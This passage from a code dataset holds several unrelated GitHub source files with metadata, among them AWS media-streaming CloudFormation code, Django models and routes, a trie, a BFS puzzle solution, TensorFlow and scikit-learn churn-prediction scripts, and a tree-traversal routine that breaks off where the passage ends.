InputAttachments=[input_attachment],\n InputSpecification=medialive.InputSpecification(\n Codec=codec,\n MaximumBitrate=max_avc_bitrate,\n Resolution=self.resolution,\n ),\n LogLevel=\"DISABLED\",\n RoleArn=role_arn,\n DependsOn=[\n mp_distribution_1,\n ],\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n )\n )\n\n \"\"\"\n Add Media Package PackagingGroup\n It's needed for creating asset for clipped VOD playback\n \"\"\"\n packaging_group = template.add_resource(\n mediapackage.PackagingGroup(\n Id=f\"MediaPackagePackagingGroup{self.channel_name}\", title=\"MediaPackageDefaultPackagingGroup\"\n )\n )\n\n \"\"\"\n Add Media Package PackagingConfiguration\n It's needed for creating asset for clipped VOD playback\n \"\"\"\n packaging_configuration = template.add_resource(\n mediapackage.PackagingConfiguration(\n Id=f\"MediaPackagePackagingConfiguration{self.channel_name}\",\n title=\"MediaPackageDefaultPackagingConfiguration\",\n PackagingGroupId=Select(1, Split(\"/\", GetAtt(packaging_group, \"Arn\"))),\n # PackagingGroupId=GetAtt(packaging_group, \"Arn\"),\n HlsPackage=mediapackage.HlsPackage(HlsManifests=[mediapackage.HlsManifest()]),\n )\n )\n \"\"\"\n Create dashboard\n \"\"\"\n channel_id = Select(8, Split(\":\", GetAtt(media_live_channel, \"Arn\")))\n\n cw_dashboard = template.add_resource(\n cloudwatch.Dashboard(\n \"CloudWatchDashboard2\",\n DashboardName=f\"Playout_{self.channel_name}\",\n DashboardBody=get_dashboard_body(\n channel_name=self.channel_name,\n channel_id=channel_id,\n region=settings.AWS_DEFAULT_REGION,\n mediapackage_channel_uuid=self.mp_channel_id,\n channel_hls_url=GetAtt(mp_endpoint_1, \"Url\"),\n ),\n )\n )\n\n distribution_url = Join(\n \"/\",\n [\n GetAtt(mp_distribution_1, \"DomainName\"),\n Select(2, Split(\"/\", GetAtt(mp_endpoint_1, \"Url\"))),\n ],\n )\n\n template.add_output(\n [\n Output(\"ChannelArn\", Value=GetAtt(media_live_channel, \"Arn\")),\n Output(\"FlowArn\", Value=GetAtt(media_connect_flow_1, \"FlowArn\")),\n Output(\"SRTIP\", Value=GetAtt(media_connect_flow_1, \"Source.IngestIp\")),\n Output(\"SRTPort\", Value=GetAtt(media_connect_flow_1, \"Source.SourceIngestPort\")),\n Output(\"DistributionDomainName\", Value=GetAtt(mp_distribution_1, \"DomainName\")),\n Output(\"DistributionUrl\", Value=distribution_url),\n Output(\"MediapackageUrl\", Value=GetAtt(mp_endpoint_1, \"Url\")),\n Output(\"DashboardId\", Value=Ref(cw_dashboard)),\n Output(\n \"FlowSourceInput\",\n Value=Join(\n \"\",\n [\n \"srt://\",\n GetAtt(media_connect_flow_1, \"Source.IngestIp\"),\n \":\",\n GetAtt(media_connect_flow_1, \"Source.SourceIngestPort\"),\n ],\n ),\n ),\n Output(\n \"MediaLiveInitialInputArn\",\n Value=GetAtt(media_live_input, \"Arn\"),\n ),\n Output(\"MediaPackagePackagingGroupArn\", Value=GetAtt(packaging_group, \"Arn\")),\n Output(\"MediaPackagePackagingConfigurationArn\", Value=GetAtt(packaging_configuration, \"Arn\")),\n ]\n )\n\n # ################\n # Add preview output to the template\n template = PreviewChannel(\n self.description,\n self.channel_name,\n template,\n f\"{self.channel_name}flow1\",\n media_connect_flow_1,\n self.preview_mp_channel_id,\n self.preview_channel_id,\n self.preview_origin_endpoint_id,\n self.preview_origin_id,\n ).template\n\n return template\n\n def start(self):\n client = self.get_boto_client(\"medialive\")\n client.start_channel(ChannelId=self.get_channel_id())\n\n def stop(self):\n try:\n channel_id = self.get_channel_id()\n except ClientError as ex:\n if \"does not exist\" in 
ex.response[\"Error\"][\"Message\"]:\n return\n raise ex\n except Exception as ex:\n logger.error(f\"Error with channel {ex}\")\n raise ex\n\n client = self.get_boto_client(\"medialive\")\n client.stop_channel(ChannelId=channel_id)\n\n def get_channel_id(self):\n return self.get_output_value(\"ChannelArn\").split(\":\")[-1]\n\n def get_flow_arn(self):\n return self.get_output_value(\"FlowArn\")\n\n def get_srt_uri(self):\n return self.get_output_value(\"FlowSourceInput\")\n\n def get_srt_ip(self):\n return self.get_output_value(\"SRTIP\")\n\n def get_distribution_uri(self):\n return self.get_output_value(\"DistributionUrl\")\n","repo_name":"starforce86/veeps_elemental","sub_path":"apps/veepsapi/apps/api/cloudformation/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":25847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74139282927","text":"class TrieNode:\n def __init__(self):\n self.is_word = False\n self.children = {} \n\n def __str__(self):\n return f\"{self.children} / {self.is_word}\"\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def add(self, word):\n current_node = self.root\n\n for index, char in enumerate(word): \n if char in current_node.children:\n current_node = current_node.children[char]\n else:\n new_node = TrieNode() \n current_node.children[char] = new_node\n current_node = new_node\n \n current_node.is_word = True\n\n def exists(self, word):\n temp = self.root\n\n for char in word:\n if char in temp.children:\n temp = temp.children[char]\n else:\n break\n\n return temp.is_word\n\ntrie = Trie()\ntrie.add('Testing')\ntrie.add('Test')\ntrie.add('Another')\nprint(trie.exists('Testing'))\nprint(trie.exists('Test'))\nprint(trie.exists('Another'))","repo_name":"gurleensethi/udacity-data-structure-algorithms-nanodegree","sub_path":"7. 
Basic Algorithms/tries.py","file_name":"tries.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33900919060","text":"from django.db import models\nfrom django.urls import reverse\n\n# Create your models here.\n\nclass AutomobileVO(models.Model):\n color = models.CharField(max_length=50)\n year = models.PositiveSmallIntegerField()\n vin = models.CharField(max_length=17, unique=True)\n\n\nclass SalesPerson(models.Model):\n name = models.CharField(max_length=100)\n employee_number = models.PositiveIntegerField()\n\n def get_api_url(self):\n return reverse(\"api_sales_person\", kwargs={\"pk\": self.id})\n\nclass PotentialCustomer(models.Model):\n name = models.CharField(max_length=100)\n address = models.CharField(max_length=200)\n phone_number = models.PositiveBigIntegerField()\n\nclass SaleRecord(models.Model):\n automobile = models.ForeignKey(\n AutomobileVO,\n related_name=\"automobile\",\n on_delete=models.PROTECT)\n sales_person = models.ForeignKey(\n SalesPerson,\n related_name=\"sales_person\",\n on_delete=models.PROTECT)\n customer = models.ForeignKey(\n PotentialCustomer,\n related_name=\"customer\",\n on_delete=models.PROTECT)\n price = models.PositiveIntegerField()\n\nclass SalesList(models.Model):\n sales_person = models.ForeignKey(\n SalesPerson,\n related_name=\"sales_list_sales_person\",\n on_delete=models.PROTECT)\n customer = models.ForeignKey(\n PotentialCustomer,\n related_name=\"sales_list_customer\",\n on_delete=models.PROTECT)\n vin = models.ForeignKey(\n AutomobileVO,\n related_name=\"sales_list_vin\",\n on_delete=models.PROTECT)\n price = models.ForeignKey(\n SaleRecord,\n related_name=\"sales_price\",\n on_delete=models.PROTECT)\n\nclass EmployeeSalesList(models.Model):\n sales_person = models.ForeignKey(\n SalesPerson,\n related_name=\"employee_sales_list_sales_person\",\n on_delete=models.PROTECT)\n customer = models.ForeignKey(\n PotentialCustomer,\n related_name=\"employee_sales_list_customer\",\n on_delete=models.PROTECT)\n vin = models.ForeignKey(\n AutomobileVO,\n related_name=\"employee_sales_list_vin\",\n on_delete=models.PROTECT)\n price = models.ForeignKey(\n SaleRecord,\n related_name=\"employee_sales_price\",\n on_delete=models.PROTECT)\n","repo_name":"StevenHuyTran/car-car","sub_path":"sales/api/sales_rest/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22015487620","text":"from derby_darts.models import Fixture\n\n__author__ = 'Michael.Saysell'\nimport csv\nfrom datetime import datetime\n\n\nclass CSVImporter(object):\n def __init__(self, file_name):\n self.file_name = file_name\n\n def read_file(self):\n return csv.reader(self.file_name)\n\n def load_file(self):\n with open(self.file_name, 'rb') as csv_file:\n contents = csv.reader(csv_file)\n\n if not contents:\n return False\n\n date_strings = next(contents)\n dates = [datetime.strptime(date_string, '%d/%m/%Y') for date_string in date_strings]\n\n section_one = ['Alv/Crewton', 'OMS A', 'Sinfin Moor', 'Coach and Horses', 'Brunswick',\n 'Duke of Clarence B', 'Courtyard B', 'Chad Lace', 'Station Inn', 'York Tavern']\n\n section_two = ['Woodlark', 'Courtyard A', 'Navigation', 'Spa Inn', '102 Club',\n 'Littleover Social', 'OMS B', 'Furnace', 'Norman Arms']\n\n section_three = ['Duke of Clarence A', 'Dunkirk', 'Junction Tav', 'Golden Eagle', '105 Club',\n 'Alexandra', 
'Seven Stars', 'Clarion Club', 'The Mile', 'BYE']\n\n for row_idx, row in enumerate([x for x in contents]):\n for idx, fixture in enumerate(row):\n if 'H' in fixture:\n print('{}: {} v {}'.format(dates[idx],\n section_three[row_idx],\n section_three[int(fixture[:-1]) - 1]))\n\n def load_file_for_season(self, teams, season):\n\n with open(self.file_name, 'rb') as csv_file:\n contents = csv.reader(csv_file)\n\n if not contents:\n return False\n\n date_strings = next(contents)\n dates = [datetime.strptime(date_string, '%d/%m/%Y') for date_string in date_strings]\n\n fixture_rows = [x for x in contents]\n\n for row_idx, row in enumerate(fixture_rows):\n for idx, fixture in enumerate(row):\n if 'H' in fixture:\n fixture, created = Fixture.objects.get_or_create(season=season,\n date=dates[idx],\n home_team=teams[row_idx],\n away_team=teams[int(fixture[:-1]) - 1])\n fixture.save()\n","repo_name":"msaysell/chao","sub_path":"Fixtures/csv_importer.py","file_name":"csv_importer.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30160751127","text":"import __future__\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom models.configuration import Config\nfrom cs231n.data_utils import load_CIFAR10\nfrom models.CNN import basic_model, transfer_learning_model\nimport matplotlib.pyplot as plt\n\n\n# Get the data\ndef get_CIFAR10_data(num_training=49000, num_validation=1000, num_test=10000):\n \"\"\"\n Load the CIFAR-10 dataset from disk and perform preprocessing to prepare\n it for the two-layer neural net classifier. These are the same steps as\n we used for the SVM, but condensed to a single function. \n \"\"\"\n # Load the raw CIFAR-10 data\n cifar10_dir = 'cs231n/datasets/cifar-10-batches-py'\n X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)\n\n # Subsample the data\n mask = range(num_training, num_training + num_validation)\n X_val = X_train[mask]\n y_val = y_train[mask]\n mask = range(num_training)\n X_train = X_train[mask]\n y_train = y_train[mask]\n mask = range(num_test)\n X_test = X_test[mask]\n y_test = y_test[mask]\n\n # Normalize the data: subtract the mean image\n mean_image = np.mean(X_train, axis=0)\n X_train -= mean_image\n X_val -= mean_image\n X_test -= mean_image\n\n return X_train, y_train, X_val, y_val, X_test, y_test\n\n\n# Invoke the above function to get our data.\n# X_train, y_train, X_val, y_val, X_test, y_test = get_CIFAR10_data(num_training=1000,num_validation=10, num_test=10)\nX_train, y_train, X_val, y_val, X_test, y_test = get_CIFAR10_data()\n# print('Train data shape: ', X_train.shape)\n# print('Train labels shape: ', y_train.shape)\n# print('Validation data shape: ', X_val.shape)\n# print('Validation labels shape: ', y_val.shape)\n# print('Test data shape: ', X_test.shape)\n# print('Test labels shape: ', y_test.shape)\n\n\n\"\"\"\ntraining\n\"\"\"\n# models = []\n# for i in range(1):\n# config = Config('config_files/reg_tuning/test.json')\n# model_folder = 'trained_models/basic_model/tuning_reg/'\n# filename = 'test{0:s}.ckpt'.format(str(i))\n\n# models.append(basic_model(config, model_folder, filename))\n \n# model_path = models[i].train(\n# \tX_train, y_train, \n# \tX_val, y_val, \n# \t)\n\n# config = Config('config.json')\n# model_folder = 'trained_models/basic_model'\n# filename = 'test.ckpt'\n\n# model = basic_model(config, model_folder, filename)\n\n# model_path = model.train(\n# X_train, y_train, \n# X_val, y_val, \n# )\n\n# for i in range(2):\n# 
acc = models[i].evaluate(X_val, y_val)\n# print(acc)\n\n# pred = models[i].predict(X_val)\n# print(pred)\n\n\n\n\"\"\"\n1 data augmentation\n2 grid search, random search, oscar\n3. transfer learning\n4. cpu, gpu, multithread, graph\n\"\"\"\n\n\"\"\"\ntransfer learning\n\"\"\"\n# config = Config('config_files/transfer_learning/test.json')\n# model_folder = 'trained_models/transfer_learning_model/transfer_learning/'\n# filename = 'test.ckpt'\n# model = transfer_learning_model(config, model_folder, filename)\n\n# # run the model to train\n# model_path = model.train(\n# data=X_train, labels=y_train, \n# val_data=X_val, val_labels=y_val, \n# original_model_path=\"trained_models/basic_model/tuning_reg/test0.ckpt\",\n# reuse_var_scope=\"Conv_Layers\",\n# train_var_scope=\"Fully_connected\"\n# )\n\n# oldGraph = tf.Graph()\n# saver = tf.train.Saver()\nwith tf.Session() as sess:\n saver = tf.train.import_meta_graph(\"trained_models/basic_model/tuning_reg/test0.ckpt.meta\")\n saver.restore(sess, \"trained_models/basic_model/tuning_reg/test0.ckpt\")\n\n # graph = tf.get_default_graph()\n # print(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=\"Conv_Layers\"))\n kernel = tf.global_variables(\"Conv_Layers/conv_layer0/conv0/kernel:0\")[0].eval()\n\ntf.reset_default_graph()\nwith tf.Session() as sess:\n saver = tf.train.import_meta_graph(\"trained_models/transfer_learning_model/transfer_learning/test.ckpt.meta\")\n saver.restore(sess, \"trained_models/transfer_learning_model/transfer_learning/test.ckpt\")\n\n # graph = tf.get_default_graph()\n # print(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=\"Conv_Layers\"))\n kernel1 = tf.global_variables(\"Conv_Layers/conv_layer0/conv0/kernel:0\")[0].eval()\n\n# with tf.Session() as sess:\nprint(kernel1 == kernel)","repo_name":"StranotDong/CNN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11820944359","text":"from evaluacion.views import EvaluacionDeleteView, EvaluacionDetailsView, EvaluacionEditView, EvaluacionListView, EvaluacionCreateView, PuntajeEvCreateView, PuntajeEvEditView, PuntajesEvListView, deletePuntajeEv, updatePuntaje, usuariosEvaluacionAPI\nfrom django.urls import path\n\napp_name=\"evaluacion\"\n\nurlpatterns= [\n\n #EVALUACION\n path('evaluacion/', EvaluacionListView.as_view(), name=\"evaluaciones\"),\n path('evaluacion/crear/', EvaluacionCreateView.as_view(), name=\"crear_evaluacion\"),\n path('evaluacion/details//', EvaluacionDetailsView.as_view(), name=\"evaluacion_details\"),\n path('evaluacion/eliminar//', EvaluacionDeleteView.as_view(), name=\"evaluacion_delete\"),\n path('evaluacion/editar//', EvaluacionEditView.as_view(), name=\"evaluacion_edit\"),\n path('evaluacionPuntajesAPI//', usuariosEvaluacionAPI),\n path('updatePuntajeEv/', updatePuntaje),\n\n #Puntajes para cada tipo de actividad\n path('configuracion/puntajes-evaluacion/', PuntajesEvListView.as_view(), name=\"evaluacion_puntajes\"),\n path('configuracion/puntajes-evaluacion/crear/', PuntajeEvCreateView.as_view(), name=\"crear_puntaje_evaluacion\"),\n path('configuracion/puntajes-evaluacion/editar//', PuntajeEvEditView.as_view(), name=\"editar_puntaje_evaluacion\"),\n path('configuracion/puntajes-evaluacion/eliminar//', deletePuntajeEv, 
name=\"delete_puntaje_evaluacion\"),\n]","repo_name":"rody2312/Proyecto-Python","sub_path":"evaluacion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25063472735","text":"import numpy as np\n\nfrom meddlr.data.build import _limit_data_by_group, get_recon_dataset_dicts\nfrom meddlr.data.catalog import DatasetCatalog\n\n\ndef test_filter_by_metadata():\n dataset = \"fastMRI_knee_multicoil_v0.0.1_train\"\n dataset_dicts = get_recon_dataset_dicts([dataset], filter_by=((\"flipAngle_deg\", 140),))\n\n assert len(dataset_dicts) > 0\n assert all(dd[\"_metadata\"][\"flipAngle_deg\"] == 140 for dd in dataset_dicts)\n\n\ndef test_num_scans_total():\n dataset = \"fastMRI_knee_multicoil_v0.0.1_val\"\n orig_dataset_dicts = DatasetCatalog.get(dataset)\n\n dataset_dicts = get_recon_dataset_dicts([dataset], num_scans_total=10)\n assert len(dataset_dicts) == 10\n\n values = {140: 10}\n dataset_dicts = get_recon_dataset_dicts([dataset], num_scans_total=((\"flipAngle_deg\", values),))\n orig_flip_angles_to_count = {\n k: v\n for k, v in zip(\n *np.unique(\n [dd[\"_metadata\"][\"flipAngle_deg\"] for dd in orig_dataset_dicts], return_counts=True\n )\n )\n }\n flip_angles_to_count = {\n k: v\n for k, v in zip(\n *np.unique(\n [dd[\"_metadata\"][\"flipAngle_deg\"] for dd in dataset_dicts], return_counts=True\n )\n )\n }\n for k in sorted(orig_flip_angles_to_count.keys()):\n if k in values:\n assert flip_angles_to_count[k] <= values[k]\n else:\n assert flip_angles_to_count[k] == orig_flip_angles_to_count[k]\n\n\ndef test_limit_data_by_group():\n dataset_dicts = [\n {\"id\": 1, \"metadata_A\": \"A1\", \"metadata_B\": \"B1\"},\n {\"id\": 2, \"metadata_A\": \"A1\", \"metadata_B\": \"B2\"},\n {\"id\": 3, \"metadata_A\": \"A1\", \"metadata_B\": \"B3\"},\n {\"id\": 4, \"metadata_A\": \"A1\", \"metadata_B\": \"B1\"},\n {\"id\": 5, \"metadata_A\": \"A2\", \"metadata_B\": \"B2\"},\n {\"id\": 6, \"metadata_A\": \"A2\", \"metadata_B\": \"B3\"},\n {\"id\": 7, \"metadata_A\": \"A3\", \"metadata_B\": \"B1\"},\n {\"id\": 8, \"metadata_A\": \"A3\", \"metadata_B\": \"B2\"},\n {\"id\": 9, \"metadata_A\": \"A3\", \"metadata_B\": \"B3\"},\n {\"id\": 10, \"metadata_A\": \"A4\", \"metadata_B\": \"B1\"},\n {\"id\": 11, \"metadata_A\": \"A4\", \"metadata_B\": \"B2\"},\n {\"id\": 12, \"metadata_A\": \"A5\", \"metadata_B\": \"B3\"},\n ]\n\n out = _limit_data_by_group(dataset_dicts, num_scans_total=((\"metadata_A\", {\"A1\": 2, \"A2\": 1}),))\n out_ids = [o[\"id\"] for o in out]\n assert out_ids == [1, 2, 5, 7, 8, 9, 10, 11, 12]\n\n out = _limit_data_by_group(dataset_dicts, num_scans_total=((\"metadata_A\", (\"A1\", 2, \"A2\", 1)),))\n out_ids = [o[\"id\"] for o in out]\n assert out_ids == [1, 2, 5, 7, 8, 9, 10, 11, 12]\n\n out = _limit_data_by_group(\n dataset_dicts, num_scans_total=((\"metadata_A\", {(\"A1\", \"A2\"): 5, \"A3\": 2}),)\n )\n out_ids = [o[\"id\"] for o in out]\n assert out_ids == [1, 2, 3, 4, 5, 7, 8, 10, 11, 12]\n","repo_name":"ad12/meddlr","sub_path":"tests/data/test_build.py","file_name":"test_build.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"2"} +{"seq_id":"38618108433","text":"from itertools import islice\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth import hashers\nfrom django.core.management.base import BaseCommand\n\nfrom faker import Faker\n\n\nUser = 
get_user_model()\nfake = Faker()\n\n\nclass Command(BaseCommand):\n    help = 'Create random users'\n\n    def add_arguments(self, parser):\n        parser.add_argument('total', type=int, choices=range(1, 11), help='Indicates the number of users to be created')\n\n    def handle(self, **kwargs):\n        total = kwargs['total']\n        objs = (User(username=fake.name(), email=fake.ascii_email(),\n                     password=hashers.make_password(str(fake.password()))) for i in range(total))\n        while True:\n            batch = list(islice(objs, total))\n            if not batch:\n                break\n            User.objects.bulk_create(batch, total)\n\n        # for i in range(total):\n        #     User.objects.create(username=fake.name(), email=fake.ascii_email(), password=fake.password())\n","repo_name":"Archibay/Django_hw_1","sub_path":"catalog/management/commands/create_users.py","file_name":"create_users.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"74038841645","text":"from collections import deque\r\ndef draw(n,m):\r\n    graph = [[] for _ in range(n+1)]  # one empty adjacency list per node\r\n    for i in range(m):\r\n        a,b = map(int,input().split())\r\n        graph[a].append(b)\r\n        graph[b].append(a)\r\n    return graph\r\ndef bfs(n,target1,target2,graph):\r\n    q = deque([(target1,0)])\r\n    visited = [False]*(n+1)\r\n    visited[target1] = True\r\n\r\n    while q:\r\n        cur, chonsu = q.popleft()\r\n        if cur == target2:\r\n            return chonsu\r\n        for next in graph[cur]:\r\n            if not visited[next]:\r\n                visited[next] = True  # mark on enqueue so each node is queued once\r\n                q.append((next,chonsu+1))\r\n    return -1  # the two people are not related\r\n\r\nn = int(input())\r\ntarget1,target2 = map(int,input().split())\r\nm = int(input())\r\ngraph = draw(n,m)\r\nchonsu = bfs(n,target1,target2,graph)\r\nprint(chonsu)\r\n","repo_name":"happyyeon/my_algorithm","sub_path":"백준/Silver/2644. 
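# The management command above drains a generator in chunks with islice so
# bulk_create never materialises everything at once. The batching pattern on
# its own (plain Python, no Django needed):
from itertools import islice

def batched(iterable, size):
    # Yield lists of at most `size` items until the iterable is exhausted.
    it = iter(iterable)
    while True:
        chunk = list(islice(it, size))
        if not chunk:
            return
        yield chunk

print(list(batched(range(7), 3)))  # [[0, 1, 2], [3, 4, 5], [6]]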
촌수계산/촌수계산.py","file_name":"촌수계산.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17481632591","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split #数据集划分\nfrom sklearn.ensemble import RandomForestClassifier # ��机森林\nfrom sklearn.metrics import confusion_matrix, classification_report #报告\nfrom sklearn.tree import DecisionTreeClassifier #决策树\nfrom sklearn.linear_model import LogisticRegression #逻辑回归\nfrom sklearn.metrics import accuracy_score #精确度\n\ndef cal_is_agree(x): # x 为每个用户的三个月值\n # 如果三个月不全为1,用第三个月值减去前两个月均值;三个月的值都为1,取值为1.5。\n # 所有取值情况为-1、-0.5、0、0.5、1、1.5\n x = np.array(x)\n if x.sum() == 3:\n return 1.5\n else:\n return x[2] - x[:2].mean()\n\ndata = pd.read_csv(\"USER_INFO_M.csv\", encoding='gbk')\ndata.drop_duplicates(inplace=True) # 数据去重\ndata.drop(['MANU_NAME', 'MODEL_NAME', 'OS_DESC', 'CONSTELLATION_DESC'], axis=1, inplace=True)\ncleardata = data;\ndata_group = cleardata.groupby('USER_ID') # 分组\n\n\nlabel = data_group[['USER_ID', 'IS_LOST']].tail(1) # 取用户id、标记(每组的最后一个值)\nlabel.set_index('USER_ID', inplace=True) # 将“USER_ID”设为索引\nlabel = data_group[['USER_ID', 'IS_LOST']].tail(1) # 取用户id、标记(每组的最后一个值)\nlabel.set_index('USER_ID', inplace=True) # 将“USER_ID”设为索引\n\ndata_1 = data_group[['CUST_SEX', 'CERT_AGE', 'TERM_TYPE']].first() \ndata_2 = data_group['INNET_MONTH'].last()\ndata_3 = pd.DataFrame(data_group['IS_AGREE'].agg(cal_is_agree))#agg是一个聚合函数,聚合函数操作始终是在轴(默认是列轴,也可设置行轴)上执行,\ndate = data_group['AGREE_EXP_DATE'].last() # 取第3个月的\"合约计划到期时长\"\nnum_mon = (pd.to_datetime(date, format='%Y%m') - pd.to_datetime('2016-03')).dt.days/30 # 时长以“月”为单位\ndata_4 = pd.DataFrame(num_mon).fillna(-1) #用-1填充缺失值\ndata_5 = pd.DataFrame(data_group['CREDIT_LEVEL'].agg('mean')) # 信用等级\n# 3.7 VIP等级\ndata_6 = data_group['VIP_LVL'].last().fillna(0) # 取最后一个值\n# 3.8 本月费用(取三个月的平均值)特征构建\ndata_7 = pd.DataFrame(data_group['ACCT_FEE'].mean())\n# 3.9 平均每次通话时长\n# 总通话\ndata_8_1 = pd.DataFrame(data_group['CALL_DURA'].sum()/data_group['CDR_NUM'].sum(),\n columns=['Total_mean'])\n# 本地通话\ndata_8_2 = pd.DataFrame(data_group['NO_ROAM_LOCAL_CALL_DURA'].sum()/data_group['NO_ROAM_LOCAL_CDR_NUM'].sum(),\n columns=['Local_mean'])\n# 国内长途通话\ndata_8_3 = pd.DataFrame(data_group['NO_ROAM_GN_LONG_CALL_DURA'].sum() / data_group['NO_ROAM_GN_LONG_CDR_NUM'].sum(),\n columns=['GN_Long_mean'])\n# 国内漫游通话\ndata_8_4 = pd.DataFrame(data_group['GN_ROAM_CALL_DURA'].sum() / data_group['GN_ROAM_CDR_NUM'].sum(),\n columns=['GN_Roam_mean'])\n# 数据拼接\ndata_8 = pd.concat([data_8_1, data_8_2, data_8_3, data_8_4], axis=1).fillna(0)\n# 3.10 其他变量\n# 非漫游通话次数(次)、短信发送数(条)、上网流量(MB)、本地非漫游上网流量(MB)、国内漫游上网流量(MB)、\n# 有通话天数、有主叫天数、有被叫天数 (主叫 + 被叫 ≠ 总通话)\n# 语音呼叫圈、主叫呼叫圈、被叫呼叫圈\ndata_9 = data_group[['NO_ROAM_CDR_NUM', 'P2P_SMS_CNT_UP', 'TOTAL_FLUX', 'LOCAL_FLUX','GN_ROAM_FLUX',\n 'CALL_DAYS', 'CALLING_DAYS', 'CALLED_DAYS',\n 'CALL_RING','CALLING_RING', 'CALLED_RING']].agg('mean')\n\n\n# 对所有特征&标签按索引重新排序,以保证数据拼接时索引一致\nlabel.sort_index(inplace=True)\ndata_1.sort_index(inplace=True)\ndata_2.sort_index(inplace=True)\ndata_3.sort_index(inplace=True)\ndata_4.sort_index(inplace=True)\ndata_5.sort_index(inplace=True)\ndata_6.sort_index(inplace=True)\ndata_7.sort_index(inplace=True)\ndata_8.sort_index(inplace=True)\ndata_9.sort_index(inplace=True)\n# 拼接所有特征&标记\ndata_new = pd.concat([data_1, data_2, data_3, data_4,\n data_5, data_6, data_7, data_8, data_9, label], axis=1)\nprint(data_new.head() )\n\n#缺失值处理\nprint(\"6 isnull 
\\n\",data_new.isnull().sum()) # 查看缺失值\ndata_new = data_new.fillna(method='ffill').fillna(method='bfill') # 近邻值填充(向下填充+向上填充)\n\ndata_new.to_csv('clear_data.csv', index=True, encoding='utf-8-sig')\ndata = pd.read_csv('clear_data.csv', index_col=0)\ncorr = data.corr() # 皮尔逊相关系数 矩阵\n# 以0.08作为筛选阈值\nfeature_index = corr['IS_LOST'].drop('IS_LOST').abs() > 0.08 # 取出与\"标记\"的相关系数\nfeature_name = feature_index.loc[feature_index].index # 选出的重要特征名\n\n# 提取特征与标记\nX = data.loc[:, feature_name] # 样本自变量\ny = data.loc[:, 'IS_LOST'] # 样本目标变量\n# 样本不平衡 \ny.value_counts()\n\nindex_positive = y.index[y == 1] # 正样本的索引\nindex_negative = np.random.choice(a=y.index[y == 0].tolist(), size=y.value_counts()[1]) # 负样本的索引,对负样本进行下采样操作\n\nX_positive = X.loc[index_positive, :] # 正样本自变量\nX_negative = X.loc[index_negative, :] # 负样本自变量\n\ny_positive = y.loc[index_positive] # 正样本标签\ny_negative = y.loc[index_negative] # 负样本标签\n\nX = pd.concat([X_positive, X_negative], axis=0) # 处理后的正样本\ny = pd.concat([y_positive, y_negative], axis=0) # 处理后的负样本\n\n\n\n##################################\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y) # 数据划分\n\nrfc = RandomForestClassifier() # 初始化随机森林模型\nrfc.fit(X_train, y_train) # 模型训练\ny_pre = rfc.predict(X_test) # 调用模型对测试样本进行预测\nprint(classification_report(y_test, y_pre)) # 打印分类报告(包含了各模型性能评价指标)\nrfc_acc = round(accuracy_score(y_pre,y_test)*100,2)\nprint(f\"logistic accuracy is: {rfc_acc}%\")\n\n######\n# 创建决策树模型\ndtc = DecisionTreeClassifier()\n# 训练模型\ndtc.fit(X_train,y_train)\n# 预测训练集和测试集结果\ndtc_pred = dtc.predict(X_test)\n# 计算精确度\ndtc_acc = round(accuracy_score(dtc_pred,y_test)*100,2)\nprint(f\"decision tree accuracy is: {dtc_acc}%\")\n\n######\n# 创建逻辑回归模型\nlr = LogisticRegression()\n# 训练模型\nlr.fit(X_train,y_train)\n# 预测训练集和测试集结果\nlr_pred = lr.predict(X_test)\n# 计算精确度\nlr_acc = round(accuracy_score(lr_pred,y_test)*100,2)\nprint(f\"logistic accuracy is: {lr_acc}%\")\n\n\nprint(\"the best acc is :\" ,(max(lr_acc,dtc_acc,rfc_acc)),\"%\")\n","repo_name":"GroganZY/Machine-Learning-laboratory","sub_path":"课设/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"16699913113","text":"# NA , Medium\n\n\n# Optimal\n# T.C. 
- O(n)\n# S.C - O(n)\n\n\n# Algorithm\n\n\nclass Node:\n    def __init__(self, val=-1, left=None, right=None) -> None:\n        self.val = val\n        self.left = left\n        self.right = right\n\n\ndef allTraversal(root):\n    pre, ino, post = [], [], []\n    stack = [[root, 1]]\n\n    while stack:\n        node, num = stack.pop(-1)\n\n        if num == 1:\n            # Go to pre-order final list\n            pre.append(node.val)\n\n            # Insert with ++\n            stack.append([node, num + 1])\n\n            # go to left\n            if node.left:\n                stack.append([node.left, 1])\n\n        elif num == 2:\n            # Go to in-order final list\n            ino.append(node.val)\n\n            # Insert with ++\n            stack.append([node, num + 1])\n\n            # go to right\n            if node.right:\n                stack.append([node.right, 1])\n        else:\n            # Go to post-order final list\n            post.append(node.val)\n\n    print(pre)\n    print(ino)\n    